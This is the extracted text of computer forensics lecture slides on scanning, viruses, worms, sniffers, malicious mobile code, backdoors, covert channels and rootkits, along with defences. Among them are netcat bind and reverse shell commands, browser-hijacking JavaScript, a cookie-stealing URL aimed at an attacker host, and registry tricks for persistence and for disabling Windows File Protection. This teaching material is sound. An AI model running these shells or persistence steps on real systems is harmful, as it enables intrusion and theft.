malware: scanners, sniffers, viruses, worms, mobile code

Malware:Scanners, Sniffers, Viruses, Worms, Mobile Code

COEN 252 / 152: Computer Forensics

Scanning

Wireless Scanners War driving: Finding Wireless Access

Points Normal WLAN needs < 100 m to access

point to function well. Good antenna can get a signals from miles

away. Omni-directional antenna make war driving easy. Directional antenna yield better results.

Can build a good one out of a Pringles box.

Scanning

Home-made War Driving Antenna

Scanning

War driving goal: Locate WLANs Determine Extended Service Set

Identifier (ESSID) Access points transmit beacon

packets approximately every 100 msec.

Scanning Active Scanning:

Broadcast 802.11 probe packets with ESSID of “Any” Implemented by netstumbler. Or Windows XP SP 2.

Listening for Beacons Put wireless card into the monitor mode.

AKA rfmon Read all packages.

Implemented by Wellenreiter, Kismet, Forcing Deauthentication

Some WLANs ignore probes with an ESSID of “any”. First, get MAC address of access point. Tool sends a wireless deauthenticate message to client

with spoofed MAC of access point. Clients now need to reassociate, revealing the ESSID.

Scanning Hardening

Set ESSID to something that does not contain the name of your organization.

Configure access points to ignore probe requests that don’t include the ESSID.

Use stronger authentication mechanism. Do not rely on MAC address alone, since this can

be spoofed. Switch from WEP to WPA Reset transmission power of access points.

Scanning

War Dialing Looking for modems by dialing all

numbers of an organization. Target are ill-configured modems.

Especially those connected to computers with remote control products such as VNC, psAnywhere, Mini Remote Control, Laplink Gold, …

Scanning Network Mapping

(Assume that attackers have gained access to the target system.) Sweeping:

Attempting to ping all possible addresses. Port mapping:

Identify services listening on ports: TCP Connect Scan

Tries to complete TCP threeway handshake. TCP Syn Scan

Attacker sends Syn, but does not ack to the Syn-Ack response by the target.

(Many systems do not log these interrupted connection attempts.)

Could result into an accidental DOS attack, since target buffers these attempts waiting for completion. Attacker could send Reset instead of the final Ack to avoid this.

Scanning Network Mapping

Port mapping: Identify services listening on ports:

Protocol Violators: TCP FIN

Attacker sends FIN packet. Target supposed to send RESET packet, if port is

closed. Target does not send anything back if the port is open.

Xmas Tree Scan: Attacker sends packets with URG, ACK, PSH, RST, SYN,

and FIN flags. Null Scan:

Attacker sends packet without any flags set. Closed port sends RESET, listening port sends nothing.

Scanning

Network Mapping Port mapping:

Identify services listening on ports: Protocol Violators: TCP ACK Scan

“Firewall Friendly”: Stateless firewalls will only let TCP packages through with the ACK flag set.

If packet passes through the firewall, then the internal system answers with a RESET packet.

Response of target is somewhat OS dependent.

Scanning FTP Bounce Scans:

Goal: Source IP address does not show up in target logs.

Exploits old FTP option (sometimes available with printers that

support FTP): FTP server allows a user to connect to them and

requests that the server send a file to another system. Attacker requests that a file is sent to every port on the

target. If the target port is open, then the FTP server tells the

attacker that it opened the connection, but could not communicate.

If the target port is closed, then the FTP server tells the attacker that it could not communicate with the target.

Scanning Idle Scanning

IP header includes a field “IP Identification”. Bunches together a bunch of fragments. Windows increases IP ID by one whenever it needs a

new number. Attacker first identifies a system that is being

blamed. Attacker then determines the current IP ID at the

blamed system. Attacker then sends fake message purporting to be

from the blamed system to the target. Target will increment IP ID number at the blamed

system if it sends a reset. Attacker determines whether the IP ID number has

increased.

Scanning

SYNscapegoat

target

Scanning

ACK IP-ID = 5

Scanning

SYN to TCP port 12345

Scanning

SYN-ACK from Port 12345

Scanning

Port open: Reset, IP-ID = 6

Scanning

SYN

Scanning

SYN-ACK IP-ID = 7

Scanning

Aha:

Target must have sent a reset attack.

Virus: The Principle

Virus attaches itself to a host that can execute instructions contained in the virus.

When the host is invoked, the virus copies itself to other locations on the system.

Executables Companion Infection Technique

OS will call the virus when the user requests the companion file.

Windows: Virus is Notepad.com to hide as Notepad.exe. Set the hidden attribute to prevent the virus from

being seen. Launch the true notebook.exe file from the virus. If the user selects Start Run and types in

notebook, then windows starts the virus (notebook.com instead of notebook.exe)

Executables

Companion Infection Technique Windows: Virus renames Notepad.exe to

Notepad.ex_ and hides it. Virus takes the place of Notepad.exe. Works with shortcuts. Used in the Trilisa virus / worm (2002)

Executables

Companion Infection Technique Virus uses alternate data stream

feature of NTFS: Streams look like one file in explorer and

directory listings. System activates the default stream, the

virus. Virus calls alternate stream. Win2KStream Virus (2000)

Executables Overwriting Techniques

Virus replaces part of an executable. Usually the executable looses functionality. Users will know that there is something

wrong. Prepending Techniques

Virus placed in front of executable. After virus executes, host program is called. Very easy for .com files. Easy to clean files.

Bliss virus had a disinfect mode built into it. Used by the NIMDA worm.

Executables Appending Infection Technique

Insert itself at the end of host file. Add a jump at the beginning of host file.

Stealth Techniques for Prepending and Appending: Compress host. When virus calls hosts, host is uncompressed

into RAM. Fill up total package (virus, compressed host)

to same size as original host. Change filler so that checksum is not

changed.

Boot Sector Modification Target Master Boot Record or Partition Boot Sector. Michelangelo Virus (1991).

Replaced MBR boot strap to elsewhere on disk. First the virus loads itself into memory, then it passes control

to the original MBR boot sector. Places itself into all boot sector of all floppies. Memory-resident copy of the virus is attached to low-level

BIOS drivers. Gets called when these are executed. Can no longer spread under WinNT, Win2K, WinXP, only

wreak havoc, e.g. by overwriting the sectors right after the partition boot sector.

Boot Sector Modification

Michelangelo Virus (1991).

Bios initializes hardware and starts drivers.

MBR executes and reads partition table.

PBS locates OS start files.

Infection of Document Files Many software use Macros:

MS Office, WordPerfect Office, StarOffice, OpenOffice, AutoCAD, Excel, …

WinOffice runs code in subroutines Document_Open() Document_Close() AutoExec() ….

These subroutines are executed with every document.

Infection of Document Files

Melissa (1999): Resides in Document_Open() Copies itself into the Normal.dot file.

Normal.dot is processed whenever MS Office starts up.

Melissa changed the Document_Close() routine.

http://www.cert.org/advisories/CA-1999-04.html

Infection of Document Files

Excel Version: Virus infects Personal.xls This file can contains macros and is

used whenever excel runs. Laroux (1996) used auto_open()

subroutine to execute whenever an excel file was opened.

Infection of Document Files Frequent macro targets in MS Office:

AutoExec() AutoClose() AutoOpen() AutoNew() AutoExit() FileClose() FileOpen() FileNew()

Other Targets Source Code Scripts

Visual Basic Scripts (.vbs) used by OS: Startup.vbs Exec.vbs

Shell scripts, Perl scripts Java Class Files

Platform independent viruses

Propagation Techniques Removable Storage

Boot sector viruses, executable viruses Yamaha’s CD-R drive firmware update contained

the Chernobyl virus. Email attachments Shared directories

Windows file sharing via Server Message Block (SMB) protocol.

Network File System shares P2P services such as Gnutella or Morpheus

Anti-Virus Defense

Antivirus software on gateways: User workstations File servers Mail servers Application servers Border firewalls Handhelds.

Anti-Virus Defense Virus signatures

Looks for small patterns indicative of a known virus.

Polymorphic viruses Heuristics

Looks for programs with bad behavior: Attempts to access the boot sector Attempts to locate all files in a directory Attempts to write to an exe file Attempts to delete hard drive contents …

Anti-Virus Defense Integrity Verification

Generate database of hashes of important files.

Recalculate these hashes and compare them to known values.

Configuration Hardening Least privilege Minimize active components. Set warnings (e.g. against macros) User education

Anti-Anti-Virus Defense Stealthing

Hide virus files. Intercept scanning of infected files. Slow rate of infection. …

Polymorphism and Metamorphism Change order of instructions in virus code Use equivalent code (increment = subtracting

with -1) Encryption of most of the virus body. Slightly change functionality of virus as it

spreads.

Anti-Anti-Virus Defense

Antivirus software deactivation Kill processes known to be antivirus

processes. Disable internet access to antivirus

vendor’s pages. Change security settings (e.g. allow

Word macros to run)

Worms

Worms: Propagates across a network Typically, does not require user

action for propagation.Virus: Infects files. Typically requires user interaction.

Worms

Worm Components Warhead Propagation Engine Target Selection Algorithm Scanning Engine Payload

Worm Warhead

A piece of code that exploits a vulnerability on the target system Exploits such as Buffer Overflow

Exploits File Sharing Attacks E-mail Common Mis-configurations

Worm Propagation Engine After gaining access, the worm must

transfer itself to the target machine. Some worms are completely contained

in the warhead. File Transfer Mechanisms

FTP TFTP HTTP SMB (MS Server Message Block)

Windows file sharing Unix servers running SAMBA

Worm Target Selection Algorithm Once the worm has gained control

of a target, it starts looking for new targets. E-mail addresses Host lists Trusted Systems Network Neighborhood DNS queries Randomly selected ip address.

Worm Scanning Engine

Once targets are identified, the worm scans for the original vulnerability.

Worm Payload Some specific action done on

behalf of the attacker. Opening up a backdoor. Planting a distributed denial of

service attack. Performing complex calculations:

password cracking math research (actually happened)

Worm Spread Worm spread is limited

Diversity of machines “Tiny Worm”

targeted only machines running security software from a medium company

was successful in infecting most machines with that software.

Worms can contain support for multiple entry methods.

Too many victims crash Fast worms can cause network congestion

Worm Trends Multiplatform worms Multiexploit worms Zero-day exploit worms

No chance to patch Fast-spreading worms: Warhol / Flash

pre-scan targets Polymorphic worms

Change appearance Metamorphic worms

Change functionality

Worm Defenses Ethical (?) Worms Antivirus tools Fast patching services Firewalling

Block arbitrarily outbound connections Prevents spreading

Establishment of Incident Response Capabilities

Sniffers Sniffers: a program that gathers traffic

from the local network. Primary attack example:

Sniffers look for authentication information from clear-text protocols such as ftp or telnet.

Passive Sniffing: Sniffer only gathers packets but does not change

the network. Active Sniffing:

Sniffer changes network settings. Example: ARP poisoning in order to route traffic

through the machine with the sniffer.

Sniffers Active Sniffing Strategies:

Used to circumvent switches passing packets on only on the relevant links.

MAC Flooding: Switches contain a Content Addressable Memory (CAM) table that

maps MAC addresses and physical ports. MAC flooder sends a flood of traffic with random spoofed MAC

addresses. When CAM is exhausted, switches either fail open (become hubs) or fail

closed (stop working). ARP Spoofing:

Attacker sends fake ARP messages to change ARP mappings. Port Stealing:

Attacker sends numerous spoofed packets with MAC of the gateway. Switch maps the MAC of gateway to the port on which the attacker sits. Victim sends packets to the attacker, who buffers them. Attacker finally sends an ARP request to clear the switch’s mapping. Gateway responds to the ARP request. This causes the switch to remap

the gateway’s MAC to the proper port. Attacker now sends buffered packets to the gateway.

Sniffers

Active Sniffing Strategies: DNS spoofing

Attacker sniffs DNS request from the line. Victim tries to resolve a name using DNS. Attacker sniffs the request and sends

fake DNS answer. Victim sends traffic now to attacker.

Sniffers Active Sniffing Strategies:

Sniffing HTTPS and SSL with man-in-the-middle attack.

Attacker uses DNS poisoning to reroute victim’s requests to his website.

Victim establishes SSL connection to the attacker. Attacker proxies the connection and sends

certificate of his own making to victim. Victim’s browser / SSL client complains about

invalid certificate. Error message is typically something like: “You are

currently not trusting this authentication authority.” Naïve user accepts.

Sniffers

Active Sniffing Strategies: TCP Nicing

Attacker injects tiny TCP window advertisements.

Victim slows down TCP rate and sniffer can keep up.

Malicious Mobile Code

Mobile Code Light-weight code that is downloaded

from a remote system and executed locally with none or little user intervention.

Examples: Java Applets JavaScripts Visual Basic Scripts Active X controls


Targets of malicious codes: Monitoring of browser activities. Obtaining access to file system. Infection with a Trojan horse. Hijacking web browser. …


Target Applications Web-browsers (most important

target) E-mail readers

Either directly or because they use the installed browser to read html messages.

XML-based protocols Web Service Architecture

Malicious Mobile Code Browser scripts:

Use scripting languages such as JavaScript, JScript, VBScript, …


Attack code Can exhaust resources.

By creating an infinite series of dialogue boxes.

By creating a form and fill in an infinite number of characters.

Hijack the browser: Takeover browser process.

Malicious Mobile Code Browser Hijacking

Use the onunload( ) function: <body onunload=“window.open(‘trap.html’))”>

Can be enhanced by resizing the window to fill the screen:

self.moveTo(0,0); self.resizeTo(screen.availWidth,screen.availHeight);

Can be enhanced with popup windows. Add bookmarks:

window.external.addFavorite(‘http://www.cse.scu’,’Info’);


Stealing cookies via browser vulnerabilities Browser automatically supplies

cookies associated with the domain of that website.

These cookies can contain valuable information.

Including authentication.

Malicious Mobile Code IE 5.01 vulnerability:

Create server-side program capable of reading cookies.

Compose a URL that would fool the browser into thinking that the site visited belongs to a different domain.

http:// evil.site.com%2fget_cookies.html%3f.boa.com

is translated into

http://evil.site.com/get_cookies.html?.boa.com

IE 5.01 would think that the top URL belongs to the boa domain and provide the cookies.


Capturing cookies With tricky URLs (see above) URL can be hidden in a javascript

command or in a hidden region of html code.


Mozilla had a vulnerability that executed javascript in the URL.


Browsers allow Javascript in URL if preceded by javascript:


Browsers allow Javascript in URL if preceded by javascript.

Change javascript in URL to retrieve cookies.


XSS (cross scripting) attack Authors injects malicious code into

a website. Browsers of visitors to this website

will execute the code.


XSS (cross scripting) attack

Vulnerable search engine does not strip out the JavaScript script:

Search engine sends the script back to victim’s browser. Victim’s browser executes JavaScript.

Browser pop-ups alert with cookie values.

Attacker needs to trick the victim into using this URL.

Malicious Mobile Code XSS (cross scripting) attack

Assume victim has interactions with a vulnerable website.

Attacker crafts a link, sends it to the victim (e.g. via email) and tricks the victim into clicking on the link.

Victims browser uses the attacker-provided URL to go to the vulnerable web server.

Web server “reflects” JavaScript back to victim’s browser.

Victim’s browser executes JavaScript (because it trusts the vulnerable web server.)

Attack JavaScript payload might be transmission of cookies.

Cookies can then be used to hijack a session, …


XSS (cross scripting) attack Malicious script can also be

embedded in html documents.


Script sends invisible request to evil.scu.edu containing cookies.

Attacker’s cgi script on the evil side processes the cookies.

Stolen cookies can be used to clone connections.


Defenses on Server Side Input filtering

Remember, all input is (potentially) evil. This is very hard, since scripts can be hidden very

well. Output filtering

The attack scripts needs to be reflected to the victim. So, this works.


Defenses on Client (= Browser) side Never surf the internet with administrator

privileges. Disable scripts.

IE explorer introduced security zones to automatically disable scripts for general domains.

Malicious Mobile Code Active X Controls

Part of Common Object Model COM Have the same powers as a normal

program Microsoft Agent allows inclusion of

animated and interactive cartoon characters in web pages.

Are executed with the same permission set as the browser.

E.g. administrator privileges.


Active X-controls can be cryptographically signed.

Possible to use social engineering to get users to accept the active X-control. For example, sign certificate by

unknown certification authority.

Malicious Mobile Code Browser Plug-Ins (a.k.a. Browser

Helper Objects (BHO) for IE.) Extends functionality of IE.

Google search bar is an BHO Preferred by writers of spyware.

Gator Xupiter

Have hidden functionality Check with BHODemon

Malicious Mobile Code Exploits in Non-malicious ActiveX controls

Some ActiveX controls are only designed for local use since they access system resources.

Could mistakenly be designated as safe for scripting. A hostile web-site can then call them in its html code.

Eyedog (1999) Scriptlet.Typelib (1999)

Some ActiveX controls are exploitable. Old Macromedia flash player when provided with a

carefully crafted input string.

Malicious Mobile Code Java Applets

By default, run in a sandbox. Browser invokes Java plug-in. If not signed, Java Runtime Environment

(JRE) runs it in a sandbox. If signed, java.policy file determines what

happens. Attackers can use social engineering to

get users to run bad java applets. Historically, there were exploits in the

JRE.

Malicious Mobile Code Java Runtime Engine exploits:

Brown Orifice (2000) Applet was able to run as a web server with full

access to the victim’s file system. Redirection of browsing session to an

arbitrary server (2002) Van der Wal: applets used to access external

URLs could bypass network access restrictions. Opera browser crash (2003)

Malicious applet invoked Opera JRE class that crashed when provided with a long input string.


E-mail clients can function essentially as a regular web browser.

All mobile code exploits function for email clients. Javascript can execute by merely

previewing the email. BubbleBoy and Kak worms spread via

email messages.


Web Bugs Tiny image within an html document. Lead to download http request.

http request comes with source IP.

Used by advertisers.


Web bug privacy attack Attacker sets cookies with unique ID. Spam with web bug

Call to web bug resource comes with cookie attached.

Call to web bug resource comes with email address attached.

Initial session is no longer anonymous.

Malicious Mobile Code Exploiting Browser Vulnerabilities

Assumed to be less dangerous, since victim needs to be tricked to go to a bad site.

Example: Download.Ject flow in Internet Explorer (2004)

Attacker took over several e-commerce servers. An innocent victim surfed to some of these sites. E-commerce server responded with a webpage

that exploits the browser. Browser exploit downloads keylogger. Keylogger gathers financial data from victim’s

computer use. Keylogger sends financial data to attacker

controlled website.


Exploiting Browser Vulnerabilities Example: IFRAME flaw (2004)

Attacker took over an ad-server. Victim’s computer downloaded ad.

Backdoors

Backdoor:A program that allows attackers to

bypass normal security controls on a system, gaining access to which they are not entitled.

Backdoor Types

Local Escalation of Privilege Remote execution of individual

commands. Remote command-line access. Remote control of the GUI.

Backdoor Installation

Attacker has compromised the system

Virus, worm, or malicious mobile code installs the backdoor.

Social engineering: Tricking the victim into installing the backdoor.

...

Starting backdoors automatically

Attacker wants to maintain access to the system.

Backdoor needs to restart whenever the system restarts.

Methods are OS dependent.

Starting backdoors automatically on Windows

Altering Startup Files and Folders Registry Task Scheduler

Starting backdoors automatically on Windows Startup folders and files

Autostart folders for individual users and all users.


Use: win.ini system.ini

Modify “shell=explorer.exe” on Win9x wininit winstart.bat (Win9x) Autoexec.bat (Win9x) Config.sys (Win9x)

Starting backdoors automatically on Windows Registry keys start programs on

login or reboot: HKLM\SOFTWARE\Microsoft\Windows\

CurrentVersion\ RunServicesOnce RunServices RunOnce Run RunOnceEx


HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\

RunServicesOnce RunServices RunOnce Run RunOnceEx

Starting backdoors automatically on Windows Registry keys start programs on login or

reboot: HKLM\SOFTWARE\Microsoft\Windows NT\

CurrentVersion\Winlogon\Userinit HKLM\SOFTWARE\Microsoft\Windows\

CurrentVersion\ShellServiceObjectDelayLoad HKLM\SOFTWARE\Policies\Microsoft\

Windows\System\ Scripts Explorer\Run

Starting backdoors automatically on Windows Registry keys start programs on login or

reboot: HKCU\SOFTWARE\Microsoft\Windows NT\

CurrentVersion\Winlogon\Userinit HKCU\SOFTWARE\Microsoft\Windows\

CurrentVersion\ShellServiceObjectDelayLoad HKCU\SOFTWARE\Policies\Microsoft\

Windows\System\ Scripts Explorer\Run


Registry keys start programs on login or reboot: HKCR\Exefiles\Shell\Open\Command

Indicates programs that will be run every time another .exe is run.

Starting backdoors automatically on Windows Use the task scheduler

Check scheduled tasks with autoruns from Sysinternals

Starting backdoors automatically on Unix

Modifying the init daemon Modifying system and service

initialization scripts Modify the internet daemon script Change user startup scripts Schedule jobs with Cron


Modify the init daemon init daemon is the first process to

start. uses /etc/inittab to find other

processes that need to be started attacker merely adds line to inittab.

Starting backdoors automatically on Unix Modify system and service initialization

scripts About 20+ system scripts

Located in /etc/rc.d or /etc/init.d Or merely plant a backdoor in an initialization

script for another service. E.g. ppp daemon

for PPP modem dial-up connections

inetd network daemon change /etc/inetd.conf


Adjust user startup scripts .login .cshrc /etc/profile .logout .xinitrc .xsession


Schedule jobs with Cron

Backdoor Defenses

System integrity tools like tripwire Apply to all resources

Backdoor with netcat netcat compiles into executable

nc. On the victim:

nc –l –p 2000 –e cmd.exe (Windows) nc –l –p 2000 –e /bin/sh (Unix)

Sets up a listener on port 2000. On the attacker:

nc [victim address] 2222 gives command shell.

Backdoor with netcat

Only works if attacker can establish a TCP connection to the port on the victim.

Firewalls can block this.

Backdoor with netcat Use an open door in the firewall and

initiate connection on the victim’s machine: Shoveling a shell

On the attacker’s machine: nc –l –p 80

netcat listener on port 80 On the victim’s machine:

nc [attacker’s address] 80 –e cmd.exe initializes outgoing connection to attacker then executes a shell

Backdoor with netcat

Alternatives to netcat cryptcat Tini Q Bindshell

Md5bd UDP_Shell TCPshell Crontab-backdoor

Virtual Network Computing Remote GUI tools

Virtual Network Computing (VNC) Windows Terminal Services Remote Desktop Service Citrix MetaFrame PCAnywhere Dameware Back Orifice 2000 SubSeven www.megasecurity.org

Virtual Network Computing VNC server allow to shovel a shell. Can be remotely installed:

Attacker has remote shell access on victim Attacker installs copy of VNC on his machine Attacker exports the registry keys

associated with VNC to the victim Attacker moves four files to victim Attacker adds registry changes to victim

This will display a VNC installation successful message on the victim

Attacker starts VNC

Defenses against Backdoor Shell Listeners

Use firewalls Filter traffic in both directions. Firewall individual machines.

Look for open ports. On the network (Nmap) Or with a trusted tool (on CD) locally.

Close unneeded ports.

Backdoors without ports

ICMP backdoor ICMP messages don’t use ports. Firewalls need to let some ICMP

messages pass. ICMP messages can carry a few bytes

of payload.

Backdoors without ports

ICMP backdoors: Loki 007shell ICMP Tunnel

available at www.packetstormsecurity.org for free.

Non-Promiscuous Sniffing Backdoors

Sniffer in non-promiscuous mode sniffs for commands in packets destined for the local machine.

Non-Promiscuous Sniffing Backdoors Cd00r

sniffs for TCP packets to ports X, Y, Z the ports are not open

syn packets to X, Y, Z: sniffer activates backdoor.

backdoor opens TCP port and shovels shell. This can be detected. Is however unnecessary with a sniffer “Future releases” will discontinue this practice. Just craft special packets instead.

when backdoor closes, port is closed.

Promiscuous Sniffing Backdoors

Promiscuous sniffer can gather packets send to any machine on the same LAN segment. IP address of suspicious traffic does

not have to originate on the victim machine.


Attacker has compromised the DSN server and installed a promiscuous sniffing backdoor there.

Promiscuous Sniffing Backdoor Attacker sends a

packet to the webserver at port 80.

Messages passes through the firewall.

Promiscuous Sniffing Backdoor Sniffer on the DSN

server sniffs the package.

Webserver does not know what to do with a malformed request.

Firewall:

Message to webserver.

Let pass.

Promiscuous Sniffing Backdoor Backdoor on DSN

reacts to packet. Sends back

message to attacker.

Spoofed return address from webserver.

Firewall lets it pass.

Firewall:

Message from webserver.

Let pass.

Covert Channels Covert Channels hide the fact that

information passes through them. Tunneling:

Protocol that carries data from another protocol.

Example: SSH SSH allows to set up a secure connection

between two computers. Can use this connection for insecure

protocols such as ftp. SSH protects these insecure applications.

Covert Channels Example: LOKI

Source: Phrack 51 Attacker install Loki server (a.k.a. LokiD) on victim. Attacker runs Loki client on his own machine. Loki tunnels attackers commands:

Attacker writes shell commands. Loki client sends out several ICMP packets to victim that

contain part of the commands. Loki server receives ICMP packets and extracts attacker

command. Loki server executes them. Reversely, Loki server wraps responses in ICMP messages,

sends them to the Loki client, which displays them. Port scanners or netstat cannot detect Loki since ICMP

does not use ports. Only traces are the Loki server running as root and ICMP

messages going back and forth.

Covert Channels Example: Reverse WWW Shell

Source: www.thc.org Attacker needs to install the reverse WWW

shell on victim’s machine Program spawns a child every day at a specific

time. Executes a local shell and connects to www server

owned by the attacker. This looks to a firewall like an ordinary http request.

www server sends back html resources that the reverse shell interprets as shell commands.

After a delay of 60 seconds in order to avoid exposure.

Covert Channels

Example: GoToMyPC Commercial, remote control tool that

uses reverse WWW shell technology. Security depends on authentication

strength (password).

Covert Channels

Tunnel through any TCP / IP traffic Insert data in unused or misused

fields in the protocol header of packets, such as:

IP Identification. TCP sequence number. TCP acknowledgment number.

Covert Channels Tunnel through any TCP / IP traffic

Insert data in unused or misused fields in the protocol header of packets, such as:

Sequence Number. Can even be used with bouncing:

1. Client generate TCP SYN packet with spoofed source address of bounce server.

Sequence number is set to one less than the ASCII code of the character to be transmitted.

Bounce Server




2. Bounce Server answers with an ACK and SYN. The ACK contains the Sequence Number of the first packet increased by one.

Bounce Server

Receiver




2. Receiver sends back a SYN/ACK or RESET, obtains the character from the Sequence Number field (now the correct character).

Bounce Server

Receiver

Defenses against backdoors without ports

Backdoors still create running processes.

Backdoors still create network packets.

Backdoors might put MAC cards into promiscuous mode.

Trojan Horses

a program with added functionality.

Trojan Horses Hiding names

change name (of netcat, vnc, ...) play with windows suffixes

just_text.txt .exe This is ONE word with a bunch of spaces in it

Use the .shs suffix (suppressed by system) just_text.txt .shs Shell scrap object

Windows uses the suffix to decide what to do with a file.

Trojan Horses Hiding names

take someone else’s name. overeager system administrators might even

remove the legitimate program thinking it might be your fake program.

windows does not let you kill program with certain names.

regardless of content csrss.exe, services.exe, smss.exe, System, System

Idle Process, winlogon.exe There might be more than one legitimate process

named winlogon or csrcc.exe

Trojan Horses

Hiding names use common typos of important files

for a Trojan ifconfig instead of ipconfig.

Trojan Horses Defenses

Pskill will kill any horse / process. Fport and lsof will find open

ports associated with the horse. Tripwire could find substitutes

for executables. Filter email attachments that are

executable.

Wrappers Wrap malware in a good program.

A.k.a. binders, packers, exe binders, exe joiners.

AFX File Lace, Elite Wrap, Exe2vbs, PE Bundle, Perl2Exe, Saran Wrap, TOPV4, Trojan Man

Combat with Anti-virus software File System Integrity checkers (Tripwire) Posted MD5, SHA1 values of downloads

Definition of Rootkit

RootkitsRootkits are Trojan horse backdoor tools that modify existing operating system software so that an attacker can keep access to and hide on a machine.

Unix User Mode Rootkits

Rootkits are bundled packages consisting of: Binary replacements that provide

backdoor access. Binary replacements that hide the

attacker. Other tools for hiding Additional Odds and Ends Installation Script

Unix User Mode Rootkits: LRK

Around since the early nineties. version 6 is appearing.

Unix User Mode Rootkits: LRK Backdoor Access:

Trojan login, rsh, ssh Altered login, rshd, sshd Same functionality, but with a special

backdoor password for “rewt” that gives root access.

Remote shell on a chosen port altered inetd, tcpd

Local privilege escalation backdoors: chfn, chsn, passwd, su


Binary Replacements that hide the attacker: Processes

ps top pidof killall crontab


Network use netstat ifconfig

Files ls find du (omits space taken by hidden

files Events

syslogd

Unix User Mode Rootkits: LRK Other tools for hiding:

fix resets the MAC times of trojaned system files. pads files so that the CRC check matches the one

of the original files. zap2, wtmp

blanks out / edits information in important files: utmp, wtmp

stores data on users currently / ever logged in. btmp

stores data on bad logins. lastlog

stores data on last login for users


Goodies bindshell

creates a backdoor listener attacker connects with netcat to the

listener sniffer

linsniffer grabs IDs and passwords for ftp, telnet


LRK Installation Script makefile allows to choose

configuration No need to understand any of the

workings of LRK installs in seconds / few minutes

Unix User Mode Rootkits: URK

Universal Root Kit Functions on a variety of Unix

variants Has slightly less functionality than

LRK

EFS2 Manipulations to hide data RunEFS, Defiler’s toolkit foil computer

forensics investigations on a UNIX machine.

RunEFS adds pointers of good blocks to the bad

blocks inodes. stores data in them. Coroner’s Toolkit and derivatives don’t look

at these blocks.

EFS2 Manipulations to hide data Defiler’s toolkit destroys data that a

forensics tool can harvest. shred and other overwrite tools destroy data

in a block. Defiler’s toolkit destorys inode and directory

information as well. Necrofile scrubs inodes clean Klismafile overwrites directory entries associated

with deleted files. This leaves blank spots in a directory. This shows that someone used Klismafile.

Windows User Mode Rootkits Windows File Protection (WFP)

Scans for changes to critical executables and libraries.

Compares digital signatures of 1700 files to a protected file

If WFP detects a change it searches for an authorized file in different locations.

WFP can be altered Windows Service Pack Installations (Update.exe) Hotfix distributions (Hotfix.exe) Windows Update Feature Windows Device Installer

Windows User Mode Rootkits

Implementing user mode rootkits in windows: Use existing interfaces Overwrite file Use DLL injection and API hooking to

manipulate running processes in memory.

Windows User Mode Rootkits Use existing interfaces:

FakeGINA sits between winlogon and

msgina

Windows User Mode Rootkits:

Windows uses Graphical Identification aNd Authentication (GINA) Windows allows system administrators to

install third party GINA tools. Windows ships with default GINA (msgina.dll)

Attacker sets registry key HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\

Winlogon

to install Fakegina Fakegina gathers passwords, passes logon credentials

to the real msgina.dll.

Windows User Mode Rootkits: Changing Files Not so easy, since WFP protects system

files Changing WFP Settings

WFP configuration is stored in the registry Attacker can change system file and

then 1. delete the version in DLL cache.

WFP cannot find a correct version. Sends message to request system CD. Administrator might ignore message

Windows User Mode Rootkits Attacker can

2. Alter the location of the Dllcache by modifying the registry.

WFP checks signatures and finds many mistakes.

Log is full of warnings.

3. Turn off WFP by changing a registry key

WFP still active until reboot. Warning message after reboot.


Attacker can 4) set the SFCDisable key to value

0xFFFFFF9D. Completely disables WFP on Win2000 No dialog warning Only a message that WFP is inactive.

Code Red II used method 4.

Windows User Mode Rootkits In order to achieve stealth mode, the

rootkit must alter the execution path of the OS or change the data structures directly.

Altering the execution path with HOOKS:

Windows User Mode Rootkits Assume that user process lists a directory. This involves calling various dll at the user

and at root level.

Windows User Mode RootkitsAPI HOOKING

The application will load kernel32.dll into its private address space. Between memory addresses

0x00010000 and 0x7FFE0000. Rootkit needs to overwrite any

function in Kernel32.dll. This is called API HOOKING

Windows User Mode Rootkits API HOOKING Method 1:

Import Address Table Hooking Most applications that use the Win32 API use an

Import Address Table. Each DLL is contained in the application’s image

in the file system in a structure called the IMAGE_IMPORT_DESCRIPTOR

When the OS loads the application, it parses the IMAGE_IMPORT_DESCRIPTOR structure and loads each required DLL into the application’s memory.

Once the DLL is mapped, the OS locates each imported function in memory and overwrites an array with that address.


API HOOKING Method 1: Import Address Table Hooking

Rootkit needs to be installed in application’s memory.

Reset one of these pointers to the rootkit code.

Windows User Mode Rootkits API HOOKING Method 2:

Inline Hooking Replace code of functions in a DLL.

Replace first 5 bytes of function with a jump to your rootkit code.

Save the overwritten bytes in a “trampoline” Rootkit executes the trampoline and then calls the

target function Target function eventually returns to rootkit. Rootkit edits return values. Rootkit passes the return values on to the calling

function.


DLL Injection forces an exe process to accept a DLL

it never requested. This is a method to get a rootkit into a

target application. As always, assumes that the attacker

has complete access to the system.

Windows User Mode Rootkits DLL Injection

forces an exe process to accept a DLL it never requested.

Allocate space in victim process for the DLL code to occupy. (VirtualAllocEx)

Allocate space in victim process for the DLL parameters. (VirtualAllocEx)

Write name and code into the memory space of the victim process. (WriteProcessMemory)

Create a thread in the victim process (CreateRemoteThread)

Free up resources in the victim process after execution is complete.


DLL Injection forces an exe process to accept a DLL

it never requested. Use of registry:

Windows NT/2000/XP/2003 has a registry key HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Windows\AppInit_DLLs

Rootkit can set the value of this key to a DLL of its own that modifies target process’ IAT.

Windows User Mode Rootkits DLL Injection allows to hijack any

process Attacker must have Debug Programs right

on system. Attacker uses DLL injection by

modifying a running dll that displays information on the screen.

Modified dll still calls original dll. But does not display all the data.

Windows User Mode Rootkits AFX Windows RootKit

Attacker uses afx windows rootkit configuration console to generate code on his machine.

Then executes it on the victim’s machine. AFX WinRK

installs itself in the System32 directory. Creates iexplore.dll and explorer.dll injects explorer.dll and iexplore.dll into

explorer.exe That process displays the GUI to users.

hides network connections, files, ...

User Level Rootkit Defenses

Preventing Root Kits Harden systems and apply patches.

Detect Root Kits File Integrity Checking (Signatures) Root Kit Identification

Look for specific changes made in most root kits

chkrootkit for Unix

Kernel Mode Rootkits

Kernel Functions Process and Thread Interprocess Communication Memory File System Hardware Interrupts

Kernel Mode Rootkits Kernel

Relies on hardware level protection

Ring 0 vs. Ring 3 for Intel CPU

Prevents user processes from accessing critical kernel data structures.

Kernel Mode Rootkit Processes running in kernel mode

belong to the kernel. Administrator, root only invoke user

mode processes. These processes access the kernel.Change in kernel changes behavior of all processes.

Kernel Mode Rootkit

Kernel Mode Rootkit Capabilities File & Directory Hiding Process Hiding Network Port Hiding Promiscuous Mode Hiding Execution Redirection Device Interception and Control

Kernel Mode Rootkit

